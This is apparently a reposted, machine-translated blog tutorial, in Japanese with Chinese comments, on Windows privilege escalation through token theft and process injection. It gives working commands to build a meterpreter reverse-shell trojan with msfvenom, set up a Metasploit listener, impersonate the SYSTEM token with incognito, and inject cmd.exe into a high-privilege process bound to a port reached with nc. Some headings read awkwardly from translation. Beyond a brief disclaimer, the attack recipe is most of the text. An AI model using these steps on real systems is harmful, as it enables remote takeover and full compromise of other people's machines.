権限昇格: トークン盗用 || プロセス インジェクション。

権限昇格: トークン盗用 || プロセス インジェクション。

権限昇格は権限エスカレーションと呼ばれます.オペレーティング システムはマルチユーザー オペレーティング システムであるため,ユーザーは権限制御を持ちます. たとえば, Web の脆弱性によって取得される権限は Web プロセスの権限です. 多くの場合, Web サービスは次のようなアカウントで開始されます.非常に低いアクセス許可. したがって、Webshel​​l を介した一部の操作は制限され、管理者特権またはシステム特権に昇格する必要があります。特権は通常、オペレーティング システムの脆弱性またはオペレーティング システムの構成ミスによって、またはデータベースや FTP ソフトウェアの脆弱性などのサード パーティ ソフトウェア サービスによってエスカレートされます。


目次:

権限昇格: トークン盗用 || プロセス インジェクション。

権力の昇格は次のように考えました。

権限昇格: トークンの盗用。

ステップ 1: バックグラウンド プログラムを生成します。

ステップ 2: 新しく生成されたプログラムを昇格するサーバーにアップロードします。

ステップ 3: msf をサーバーに直接インストールします。

ステップ 4: Windows オペレーティング システムでプログラムを実行し、サーバーに戻る

ステップ 5: アクセス許可を増やす (トークンの盗用)

権限昇格: プロセス インジェクション。

手順 1: コマンド ラインを開き、プログラムをコマンド ラインにドラッグして、-l を追加します。

 ステップ 2: 高い権限を持つプロセスを見つけて、cmd を挿入します。

ステップ 3: nc を使用してこのポートに接続し、cmd ウィンドウに入ります。


免責事項:

この記事に記載されている技術を使用して違法な攻撃を行うことは固く禁じられています。使用しない場合の結果は自己責任であり、アップロード者は一切の責任を負いません。


権力の昇格は次のように考えました。

リモート プロシージャ コールを実行するときに昇格された権限が要求されます。この呼び出しは、特権付き操作を実行するための特権付きセキュリティ トークンを生成するために呼び出されます。システムがトークンをプロセス自体だけでなく、元のリクエスト プロセスにも使用できるようにすると、脆弱性が現れます(この種の技術は主に、windows2008 [含む: windows2008] 以前のオペレーティング システムで使用されます)。

ローカル権限昇格の実験: セッションを取得 - モジュールを使用 - トークンを盗む - 権限昇格

プロセス インジェクション権限エスカレーションは、ローカル権限エスカレーション用の比較的古いセキュリティ テクノロジです. 挿入されたプロセスの所有者を使用して、権限共有メカニズムを実装します. このタイプのテクノロジは、主に Windows 2008 より前のオペレーティング システムで使用されます。フォローアップ より高いバージョンのシステムをターゲットにするために、ローカル特権エスカレーションのより多くの方法を使用できます。


権限昇格: トークンの盗用。

最初のステップ: バックグラウンド プログラムの生成 (トロイの木馬)

バックグラウンド プログラム (トロイの木馬): https://tianyuk.blog.csdn.net/article/details/123541093

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105 
lport=4444 -f exe > bgxg.exe
 
// lhost=kali的IP地址 
// lport=端口号(比如4444) 
// -f exe > 文件名.exe


ステップ 2: 新しく生成されたプログラムを昇格するサーバーにアップロードします。


ステップ 3: msf をサーバーに直接インストールします (ここでテストするために、msf を kali に直接インストールします) (2 つのサーバーが通信できる必要があります)。

msfconsole            //打开 msf 命令

use exploit/multi/handler        //加载模块

set payload windows/meterpreter/reverse_tcp  
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)   

set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)

set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)

run                //执行命令


ステップ 4: Windows オペレーティング システムでプログラムを実行し、サーバー ( kali ) に戻ります。


ステップ 5: アクセス許可を増やす (トークンの盗用)

getuid        //查看权限

use incognito        //窃取令牌模块

list_tokens -u       //查看可以窃取权限

impersonate_token "NT AUTHORITY\SYSTEM"    //窃取权限


権限昇格: プロセス インジェクション。

手順 1: コマンド ラインを開き、プログラムをコマンド ラインにドラッグして、-l を追加します(現在のコンピューター プロセス リストを取得します)。


 ステップ 2: 高い権限を持つプロセスを見つけて、cmd を挿入します。

-p           //是指注入进程
604          //是IPD的编号
cmd.exe      //cmd窗口
6666         //是端口

整条命令的意思就是:
把 cmd 窗口注入把这个进程中,然后在本地开启这个端口.
谁连接的这个端口就能进入到 cmd 窗口中.


ステップ 3: nc を使用してこのポートに接続し、cmd ウィンドウに入ります。

nc 目标IP地址 端口

nc 192.168.0.106 6666    

    

    

おすすめ

転載: blog.csdn.net/weixin_54977781/article/details/130448240